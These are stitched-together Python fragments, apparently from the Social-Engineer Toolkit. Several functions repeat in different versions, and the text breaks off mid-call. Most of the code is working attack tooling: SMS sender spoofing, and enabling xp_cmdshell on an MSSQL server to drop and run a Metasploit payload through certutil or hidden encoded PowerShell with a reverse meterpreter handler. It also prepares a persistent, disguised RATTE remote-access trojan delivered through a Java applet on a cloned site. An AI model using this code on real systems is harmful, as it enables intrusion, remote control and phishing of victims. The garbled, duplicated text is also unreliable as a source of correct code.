def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
core.print_status("Note that the password below will be masked and you will not see the output.")
pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
tonumber = input(core.setprompt(["7"], "Enter the number to send the SMS TO - be sure to include "
"country code (example: +15551234567)"))
fromnumber = input(core.setprompt(["7"], "Enter the number you want to come FROM - be sure to include "
"country code (example: +15551234567)"))
message = input(core.setprompt(["7"], "Enter the message you want to send via the text message"))
# note that the function for this is in a compiled python file with no source -
# this was done at the request of the third party we use since the API is not documented.
# I hand wrote the code and can validate its authenticity - it imports python requests
# and json and uses that to interact with the API. From a security standpoint if you are
# uncomfortable using this - feel free to ping me and I can walk you through what I do
# without giving away the API from the third party.
from src.sms.protectedapi import send_sms
send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
else:
core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
def update_config():
init_file = file("%s/config/set_config" % (definepath), "r")
new_config = file("%s/config/set_config.py" % (definepath), "w")
timestamp = str(datetime.datetime.now())
new_config.write(
"""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set_config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set_config.py generated: """
+ timestamp
+ """ #
# #
#######################################################################
CONFIG_DATE='"""
+ timestamp
+ """'\n"""
)
for line in init_file:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + "=" + value + "\n")
init_file.close()
new_config.close()
sleep(1)
from set_config import CONFIG_DATE as verify
print_info("New set_config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
def update_config():
if not os.path.isdir("/etc/setoolkit"):
os.makedirs("/etc/setoolkit")
init_file = open("/etc/setoolkit/set.config", "r")
new_config = open("/etc/setoolkit/set_config.py", "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set.config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set.config.py generated: """ + timestamp + """ #
# #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()
sleep(1)
sys.path.append("/etc/setoolkit")
from set_config import CONFIG_DATE as verify
print_info("New set.config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
#with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite = file(core.setdir + "/payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close()
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# launch powershell
#prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
#with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
filewrite.close()
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...")
#child2.expect("Starting the payload handler", timeout=30000)
child2.expect("Processing", timeout=30000)
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nМожет быть, вы неправильно написали адрес?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Порт RATTE Server должен прослушивать [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Введите порт RATTE Сервер должен прослушивать [8080]")
))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"],
"Должен ли RATTE быть постоянным [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"
))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Полезная нагрузка была экспортирована в %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Запустите слушатель ratteserver сейчас [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Старт ратсервер...")
ratte_listener_start(ratteport)
core.print_info("Остановка ратсервера...")
sleep(2)
valid_response = True
else:
core.print_warning(
"действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
os.chdir("src/html/unsigned")
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
core.print_error("*** WARNING ***")
core.print_error(
"IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk"
)
core.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = core.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias {0} "
"-keystore mykeystore "
"-keypass mykeypass "
"-storepass mystorepass".format(random_string),
shell=True).wait()
#!/usr/bin/env python
import random
from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
author=raw_input(core.setprompt(["7"], "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
origin=raw_input(core.setprompt(["7"], "Source phone # of the template"))
subject=raw_input(core.setprompt(["7"], "Subject of the template"))
body=raw_input(core.setprompt(["7"], "Body of the message"))
filewrite=file("src/templates/sms/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('ORIGIN='+'"'+origin+'"\n\n')
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
filewrite.close()
except Exception, e:
core.print_error("An error occured:")
core.print_error("ERROR:" + str(e))
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query(
"exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print(
"""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
)
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status(
"Powershell injection was selected to deploy to the remote system (awesome)."
)
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower(
) == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input(
"Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
)
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error(
"Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
)
choice1 = "1"
if choice1 == "1":
web_path = None
prep_powershell_payload()
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir),
shell=True).wait()
subprocess.Popen(
"cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
% (core.setdir, core.setdir),
shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status(
"Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status(
"Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(
core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode..."
)
with open(os.path.join(core.setdir + "/payload_options.shellcode"),
"w") as filewrite:
# format needed for shellcode generation
filewrite.write(
"windows/meterpreter/reverse_https {0},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(
x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(
os.path.join(core.setdir +
"reports/powershell")))
with open(
os.path.join(
core.setdir +
"/reports/powershell/x86_powershell_injection.txt"),
"w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(
os.path.join(core.setdir +
"reports/powershell/powershell.rc"),
"w") as filewrite:
filewrite.write(
"use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(
os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir +
"reports/powershell/powershell.rc")))
core.print_status(
"Waiting for the listener to start first before we continue forward..."
)
core.print_status(
